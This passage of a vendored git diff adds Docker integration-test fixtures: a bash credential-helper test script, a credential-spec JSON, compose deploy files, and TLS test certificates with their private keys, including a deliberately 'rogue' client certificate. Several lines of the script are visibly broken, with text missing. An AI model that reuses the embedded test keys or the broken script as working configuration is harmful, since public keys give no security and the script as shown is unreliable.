b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test new file mode 100755 index 0000000000..a7be56b2f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test @@ -0,0 +1,55 @@ +#!/bin/bash + +set -e + +listFile=shell_test_list.json + +case $1 in + "store") + in=$( $TEMP/$serverHash + # add the server to the list file + if [[ ! 
-f $TEMP/$listFile ]]; then + echo "{ \"${server}\": \"${username}\" }" > $TEMP/$listFile + else + list=$(<$TEMP/$listFile) + echo "$list" | jq ". + {\"${server}\": \"${username}\"}" > $TEMP/$listFile + fi + ;; + "get") + in=$( $TEMP/$listFile + ;; + "list") + if [[ ! -f $TEMP/$listFile ]]; then + echo "{}" + else + payload=$(<$TEMP/$listFile) + echo "$payload" + fi + ;; + *) + echo "unknown credential option" + exit 1 + ;; +esac diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json b/vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json new file mode 100644 index 0000000000..28913e49de --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json @@ -0,0 +1,25 @@ +{ + "CmsPlugins": [ + "ActiveDirectory" + ], + "DomainJoinConfig": { + "Sid": "S-1-5-21-4288985-3632099173-1864715694", + "MachineAccountName": "MusicStoreAcct", + "Guid": "3705d4c3-0b80-42a9-ad97-ebc1801c74b9", + "DnsTreeName": "hyperv.local", + "DnsName": "hyperv.local", + "NetBiosName": "hyperv" + }, + "ActiveDirectoryConfig": { + "GroupManagedServiceAccounts": [ + { + "Name": "MusicStoreAcct", + "Scope": "hyperv.local" + }, + { + "Name": "MusicStoreAcct", + "Scope": "hyperv" + } + ] + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml new file mode 100644 index 0000000000..f30c04f8f1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml @@ -0,0 +1,9 @@ + +version: "3" +services: + web: + image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 + command: top + db: + image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 + command: "tail -f /dev/null" diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml 
b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml new file mode 100644 index 0000000000..4ec8cacc9b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml @@ -0,0 +1,11 @@ + +version: "3.1" +services: + web: + image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 + command: top + secrets: + - special +secrets: + special: + file: fixtures/secrets/default diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml new file mode 100644 index 0000000000..6ac92cddee --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml @@ -0,0 +1,20 @@ + +version: "3.1" +services: + web: + image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 + command: top + secrets: + - special + - source: super + target: foo.txt + mode: 0400 + - star +secrets: + special: + file: fixtures/secrets/default + super: + file: fixtures/secrets/default + star: + external: + name: outside diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem new file mode 100644 index 0000000000..6825d6d1bd --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem @@ -0,0 +1,23 @@ +-----BEGIN CERTIFICATE----- +MIID0TCCAzqgAwIBAgIJAP2r7GqEJwSnMA0GCSqGSIb3DQEBBQUAMIGiMQswCQYD +VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG +A1UEChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMI +Y2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWls +QGhvc3QuZG9tYWluMB4XDTEzMTIwMzE2NTYzMFoXDTIzMTIwMTE2NTYzMFowgaIx +CzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2Nv +MRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYD 
+VQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEW +EG1haWxAaG9zdC5kb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALAn +0xDw+5y7ZptQacq66pUhRu82JP2WU6IDgo5QUtNU6/CX5PwQATe/OnYTZQFbksxp +AU9boG0FCkgxfsgPYXEuZxVEGKI2fxfKHOZZI8mrkWmj6eWU/0cvCjGVc9rTITP5 +sNQvg+hORyVDdNp2IdsbMJayiB3AQYMFx3vSDOMTAgMBAAGjggELMIIBBzAdBgNV +HQ4EFgQUZu7DFz09q0QBa2+ymRm9qgK1NPswgdcGA1UdIwSBzzCBzIAUZu7DFz09 +q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD +QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x +ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI +Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq +hCcEpzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAF8fJKKM+/oOdnNi +zEd0M1+PmZOyqvjYQn/2ZR8UHH6Imgc/OPQKZXf0bVE1Txc/DaUNn9Isd1SuCuaE +ic3vAIYYU7PmgeNN6vwec48V96T7jr+GAi6AVMhQEc2hHCfVtx11Xx+x6aHDZzJt +Zxtf5lL6KSO9Y+EFwM+rju6hm5hW +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem new file mode 100644 index 0000000000..c05ed47c2c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem @@ -0,0 +1,73 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 3 (0x3) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Dec 4 14:17:54 2013 GMT + Not After : Dec 2 14:17:54 2023 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:ca:c9:05:d0:09:4e:3e:a4:fc:d5:14:f4:a5:e8: + 34:d3:6b:51:e3:f3:62:ea:a1:f0:e8:ed:c4:2a:bc: + f0:4f:ca:07:df:e3:88:fa:f4:21:99:35:0e:3d:ea: + b0:86:e7:c4:d2:8a:83:2b:42:b8:ec:a3:99:62:70: + 
81:46:cc:fc:a5:1d:d2:63:e8:eb:07:25:9a:e2:25: + 6d:11:56:f2:1a:51:a1:b6:3e:1c:57:32:e9:7b:2c: + aa:1b:cc:97:2d:89:2d:b1:c9:5e:35:28:4d:7c:fa: + 65:31:3e:f7:70:dd:6e:0b:3c:58:af:a8:2e:24:c0: + 7e:4e:78:7d:0a:9e:8f:42:43 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Comment: + Easy-RSA Generated Certificate + X509v3 Subject Key Identifier: + DE:42:EF:2D:98:A3:6C:A8:AA:E0:8C:71:2C:9D:64:23:A9:E2:7E:81 + X509v3 Authority Key Identifier: + keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB + DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:FD:AB:EC:6A:84:27:04:A7 + + X509v3 Extended Key Usage: + TLS Web Client Authentication + X509v3 Key Usage: + Digital Signature + Signature Algorithm: sha1WithRSAEncryption + 1c:44:26:ea:e1:66:25:cb:e4:8e:57:1c:f6:b9:17:22:62:40: + 12:90:8f:3b:b2:61:7a:54:94:8f:b1:20:0b:bf:a3:51:e3:fa: + 1c:a1:be:92:3a:d0:76:44:c0:57:83:ab:6a:e4:1a:45:49:a4: + af:39:0d:60:32:fc:3a:be:d7:fb:5d:99:7a:1f:87:e7:d5:ab: + 84:a2:5e:90:d8:bf:fa:89:6d:32:26:02:5e:31:35:68:7f:31: + f5:6b:51:46:bc:af:70:ed:5a:09:7d:ec:b2:48:4f:fe:c5:2f: + 56:04:ad:f6:c1:d2:2a:e4:6a:c4:87:fe:08:35:c5:38:cb:5e: + 4a:c4 +-----BEGIN CERTIFICATE----- +MIIEFTCCA36gAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv +cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l +MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv +bWFpbjAeFw0xMzEyMDQxNDE3NTRaFw0yMzEyMDIxNDE3NTRaMIGgMQswCQYDVQQG +EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE +ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xp +ZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0 +LmRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAyskF0AlOPqT81RT0 +peg002tR4/Ni6qHw6O3EKrzwT8oH3+OI+vQhmTUOPeqwhufE0oqDK0K47KOZYnCB 
+Rsz8pR3SY+jrByWa4iVtEVbyGlGhtj4cVzLpeyyqG8yXLYktscleNShNfPplMT73 +cN1uCzxYr6guJMB+Tnh9Cp6PQkMCAwEAAaOCAVkwggFVMAkGA1UdEwQCMAAwLQYJ +YIZIAYb4QgENBCAWHkVhc3ktUlNBIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNV +HQ4EFgQU3kLvLZijbKiq4IxxLJ1kI6nifoEwgdcGA1UdIwSBzzCBzIAUZu7DFz09 +q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD +QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x +ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI +Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq +hCcEpzATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8EBAMCB4AwDQYJKoZIhvcN +AQEFBQADgYEAHEQm6uFmJcvkjlcc9rkXImJAEpCPO7JhelSUj7EgC7+jUeP6HKG+ +kjrQdkTAV4OrauQaRUmkrzkNYDL8Or7X+12Zeh+H59WrhKJekNi/+oltMiYCXjE1 +aH8x9WtRRryvcO1aCX3sskhP/sUvVgSt9sHSKuRqxIf+CDXFOMteSsQ= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem new file mode 100644 index 0000000000..b5c15f8dc7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMrJBdAJTj6k/NUU +9KXoNNNrUePzYuqh8OjtxCq88E/KB9/jiPr0IZk1Dj3qsIbnxNKKgytCuOyjmWJw +gUbM/KUd0mPo6wclmuIlbRFW8hpRobY+HFcy6XssqhvMly2JLbHJXjUoTXz6ZTE+ +93Ddbgs8WK+oLiTAfk54fQqej0JDAgMBAAECgYBOFEzKp2qbMEexe9ofL2N3rDDh +xkrl8OijpzkLA6i78BxMFn4dsnZlWUpciMrjhsYAExkiRRSS+QMMJimAq1jzQqc3 +FAQV2XGYwkd0cUn7iZGvfNnEPysjsfyYQM+m+sT0ATj4BZjVShC6kkSjTdm1leLN +OSvcHdcu3Xxg9ufF0QJBAPYdnNt5sIndt2WECePuRVi+uF4mlxTobFY0fjn26yhC +4RsnhhD3Vldygo9gvnkwrAZYaALGSPBewes2InxvjA8CQQDS7erKiNXpwoqz5XiU +SVEsIIVTdWzBjGbIqMOu/hUwM5FK4j6JTBks0aTGMyh0YV9L1EzM0X79J29JahCe +iQKNAkBKNMOGqTpBV0hko1sYDk96YobUXG5RL4L6uvkUIQ7mJMQam+AgXXL7Ctuy +v0iu4a38e8tgisiTMP7nHHtpaXihAkAOiN54/lzfMsykANgCP9scE1GcoqbP34Dl +qttxH4kOPT9xzY1JoLjLYdbc4YGUI3GRpBt2sajygNkmUey7P+2xAkBBsVCZFvTw 
+qHvOpPS2kX5ml5xoc/QAHK9N7kR+X7XFYx82RTVSqJEK4lPb+aEWn+CjiIewO4Q5 +ksDFuNxAzbhl +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem new file mode 100644 index 0000000000..21ae4bd579 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem @@ -0,0 +1,73 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 2 (0x2) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Evil Inc, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Feb 24 17:54:59 2014 GMT + Not After : Feb 22 17:54:59 2024 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:e8:e2:2c:b8:d4:db:89:50:4f:47:1e:68:db:f7: + e4:cc:47:41:63:75:03:37:50:7a:a8:4d:27:36:d5: + 15:01:08:b6:cf:56:f7:56:6d:3d:f9:e2:8d:1a:5d: + bf:a0:24:5e:07:55:8e:d0:dc:f1:fa:19:87:1d:d6: + b6:58:82:2e:ba:69:6d:e9:d9:c8:16:0d:1d:59:7f: + f4:8e:58:10:01:3d:21:14:16:3c:ec:cd:8c:b7:0e: + e6:7b:77:b4:f9:90:a5:17:01:bb:84:c6:b2:12:87: + 70:eb:9f:6d:4f:d0:68:8b:96:c0:e7:0b:51:b4:9d: + 1d:7b:6c:7b:be:89:6b:88:8b + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Comment: + Easy-RSA Generated Certificate + X509v3 Subject Key Identifier: + 9E:F8:49:D0:A2:76:30:5C:AB:2B:8A:B5:8D:C6:45:1F:A7:F8:CF:85 + X509v3 Authority Key Identifier: + keyid:DC:A5:F1:76:DB:4E:CD:8E:EF:B1:23:56:1D:92:80:99:74:3B:EA:6F + DirName:/C=US/ST=CA/L=SanFrancisco/O=Evil Inc/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:E7:21:1E:18:41:1B:96:83 + + X509v3 Extended Key Usage: + TLS Web Client Authentication + X509v3 Key Usage: + 
Digital Signature + Signature Algorithm: sha1WithRSAEncryption + 48:76:c0:18:fa:0a:ee:4e:1a:ec:02:9d:d4:83:ca:94:54:a1: + 3f:51:2f:3e:4b:95:c3:42:9b:71:a0:4b:d9:af:47:23:b9:1c: + fb:85:ba:76:e2:09:cb:65:bb:d2:7d:44:3d:4b:67:ba:80:83: + be:a8:ed:c4:b9:ea:1a:1b:c7:59:3b:d9:5c:0d:46:d8:c9:92: + cb:10:c5:f2:1a:38:a4:aa:07:2c:e3:84:16:79:c7:95:09:e3: + 01:d2:15:a2:77:0b:8b:bf:94:04:e9:7f:c0:cd:e6:2e:64:cd: + 1e:a3:32:ec:11:cc:62:ce:c7:4e:cd:ad:48:5c:b1:b8:e9:76: + b3:f9 +-----BEGIN CERTIFICATE----- +MIIEDTCCA3agAwIBAgIBAjANBgkqhkiG9w0BAQUFADCBnjELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xETAPBgNVBAoTCEV2 +aWwgSW5jMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hhbmdlbWUxETAP +BgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9tYWlu +MB4XDTE0MDIyNDE3NTQ1OVoXDTI0MDIyMjE3NTQ1OVowgaAxCzAJBgNVBAYTAlVT +MQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxG +b3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMQ8wDQYDVQQDEwZjbGllbnQx +ETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9t +YWluMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDo4iy41NuJUE9HHmjb9+TM +R0FjdQM3UHqoTSc21RUBCLbPVvdWbT354o0aXb+gJF4HVY7Q3PH6GYcd1rZYgi66 +aW3p2cgWDR1Zf/SOWBABPSEUFjzszYy3DuZ7d7T5kKUXAbuExrISh3Drn21P0GiL +lsDnC1G0nR17bHu+iWuIiwIDAQABo4IBVTCCAVEwCQYDVR0TBAIwADAtBglghkgB +hvhCAQ0EIBYeRWFzeS1SU0EgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW +BBSe+EnQonYwXKsrirWNxkUfp/jPhTCB0wYDVR0jBIHLMIHIgBTcpfF2207Nju+x +I1YdkoCZdDvqb6GBpKSBoTCBnjELMAkGA1UEBhMCVVMxCzAJBgNVBAgTAkNBMRUw +EwYDVQQHEwxTYW5GcmFuY2lzY28xETAPBgNVBAoTCEV2aWwgSW5jMREwDwYDVQQL +EwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1l +MR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9tYWluggkA5yEeGEEbloMwEwYD +VR0lBAwwCgYIKwYBBQUHAwIwCwYDVR0PBAQDAgeAMA0GCSqGSIb3DQEBBQUAA4GB +AEh2wBj6Cu5OGuwCndSDypRUoT9RLz5LlcNCm3GgS9mvRyO5HPuFunbiCctlu9J9 +RD1LZ7qAg76o7cS56hobx1k72VwNRtjJkssQxfIaOKSqByzjhBZ5x5UJ4wHSFaJ3 +C4u/lATpf8DN5i5kzR6jMuwRzGLOx07NrUhcsbjpdrP5 +-----END CERTIFICATE----- diff --git 
a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem new file mode 100644 index 0000000000..53c122ab70 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAOjiLLjU24lQT0ce +aNv35MxHQWN1AzdQeqhNJzbVFQEIts9W91ZtPfnijRpdv6AkXgdVjtDc8foZhx3W +tliCLrppbenZyBYNHVl/9I5YEAE9IRQWPOzNjLcO5nt3tPmQpRcBu4TGshKHcOuf +bU/QaIuWwOcLUbSdHXtse76Ja4iLAgMBAAECgYADs+TmI2xCKKa6CL++D5jxrohZ +nnionnz0xBVFh+nHlG3jqgxQsXf0yydXLfpn/2wHTdLxezHVuiYt0UYg7iD0CglW ++IjcgMebzyjLeYqYOE5llPlMvhp2HoEMYJNb+7bRrZ1WCITbu+Su0w1cgA7Cs+Ej +VlfvGzN+qqnDThRUYQJBAPY0sMWZJKly8QhUmUvmcXdPczzSOf6Mm7gc5LR6wzxd +vW7syuqk50qjqVqFpN81vCV7GoDxRUWbTM9ftf7JGFkCQQDyJc/1RMygE2o+enU1 +6UBxJyclXITEYtDn8aoEpLNc7RakP1WoPUKjZOnjkcoKcIkFNkSPeCfQujrb5f3F +MkuDAkByAI/hzzmkpK5rFxEsjfX4Mve/L/DepyjrpaVY1IdWimlO1aJX6CeY7hNa +8QsYt/74s/nfvtg+lNyKIV1aLq9xAkB+WSSNgfyTeg3x08vc+Xxajmdqoz/TiQwg +OoTQL3A3iK5LvZBgXLasszcnOycFE3srcQmNItEDpGiZ3QPxJTEpAkEA45EE9NMJ +SA7EGWSFlbz4f4u4oBeiDiJRJbGGfAyVxZlpCWUjPpg9+swsWoFEOjnGYaChAMk5 +nrOdMf15T6QF7Q== +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem new file mode 100644 index 0000000000..08abfd1a3b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem @@ -0,0 +1,76 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 4 (0x4) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Dec 4 15:01:20 2013 GMT + Not After : Dec 2 15:01:20 2023 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, 
OU=changeme, CN=*/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:c1:ff:7d:30:6f:64:4a:b1:92:b1:71:d1:c1:74: + e2:1d:db:2d:11:24:e1:00:d4:00:ae:6f:c8:9e:ae: + 67:b3:4a:bd:f7:e6:9e:57:6d:19:4c:3c:23:94:2d: + 3d:d6:63:84:d8:fa:76:2b:38:12:c1:ed:20:9d:32: + e0:e8:c2:bf:9a:77:70:04:3f:7f:ca:8c:2c:82:d6: + 3d:25:5c:02:1a:4f:64:93:03:dd:9c:42:97:5e:09: + 49:af:f0:c2:e1:30:08:0e:21:46:95:d1:13:59:c0: + c8:76:be:94:0d:8b:43:67:21:33:b2:08:60:9d:76: + a8:05:32:1e:f9:95:09:14:75 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Cert Type: + SSL Server + Netscape Comment: + Easy-RSA Generated Server Certificate + X509v3 Subject Key Identifier: + 14:02:FD:FD:DD:13:38:E0:71:EA:D1:BE:C0:0E:89:1A:2D:B6:19:06 + X509v3 Authority Key Identifier: + keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB + DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:FD:AB:EC:6A:84:27:04:A7 + + X509v3 Extended Key Usage: + TLS Web Server Authentication + X509v3 Key Usage: + Digital Signature, Key Encipherment + Signature Algorithm: sha1WithRSAEncryption + 40:0f:10:39:c4:b7:0f:0d:2f:bf:d2:16:cc:8e:d3:9a:fb:8b: + ce:4b:7b:0d:48:77:ce:f1:fe:d5:8f:ea:b1:71:ed:49:1d:9f: + 23:3a:16:d4:70:7c:c5:29:bf:e4:90:34:d0:f0:00:24:f4:e4: + df:2c:c3:83:01:66:61:c9:a8:ab:29:e7:98:6d:27:89:4a:76: + c9:2e:19:8e:fe:6e:d5:f8:99:11:0e:97:67:4b:34:e3:1e:e3: + 9f:35:00:a5:32:f9:b5:2c:f2:e0:c5:2e:cc:81:bd:18:dd:5c: + 12:c8:6b:fa:0c:17:74:30:55:f6:6e:20:9a:6c:1e:09:b4:0c: + 15:42 +-----BEGIN CERTIFICATE----- +MIIEKjCCA5OgAwIBAgIBBDANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv +cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l +MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv 
+bWFpbjAeFw0xMzEyMDQxNTAxMjBaFw0yMzEyMDIxNTAxMjBaMIGbMQswCQYDVQQG +EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE +ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEKMAgGA1UEAxQBKjER +MA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21h +aW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMH/fTBvZEqxkrFx0cF04h3b +LREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y4OjCv5p3 +cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+lA2LQ2ch +M7IIYJ12qAUyHvmVCRR1AgMBAAGjggFzMIIBbzAJBgNVHRMEAjAAMBEGCWCGSAGG ++EIBAQQEAwIGQDA0BglghkgBhvhCAQ0EJxYlRWFzeS1SU0EgR2VuZXJhdGVkIFNl +cnZlciBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQUFAL9/d0TOOBx6tG+wA6JGi22GQYw +gdcGA1UdIwSBzzCBzIAUZu7DFz09q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJ +BgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUw +EwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD +EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h +aWxAaG9zdC5kb21haW6CCQD9q+xqhCcEpzATBgNVHSUEDDAKBggrBgEFBQcDATAL +BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEAQA8QOcS3Dw0vv9IWzI7TmvuL +zkt7DUh3zvH+1Y/qsXHtSR2fIzoW1HB8xSm/5JA00PAAJPTk3yzDgwFmYcmoqynn +mG0niUp2yS4Zjv5u1fiZEQ6XZ0s04x7jnzUApTL5tSzy4MUuzIG9GN1cEshr+gwX +dDBV9m4gmmweCbQMFUI= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem new file mode 100644 index 0000000000..c269320ef0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAMH/fTBvZEqxkrFx +0cF04h3bLREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y +4OjCv5p3cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+ +lA2LQ2chM7IIYJ12qAUyHvmVCRR1AgMBAAECgYAmwckb9RUfSwyYgLm8IYLPHiuJ +wkllZfVg5Bo7gXJcQnFjZmJ56uTj8xvUjZlODIHM63TSO5ibv6kFXtXKCqZGd2M+ +wGbhZ0f+2GvKcwMmJERnIQjuoNaYSQLT0tM0VB9Iz0rJlZC+tzPZ+5pPqEumRdsS 
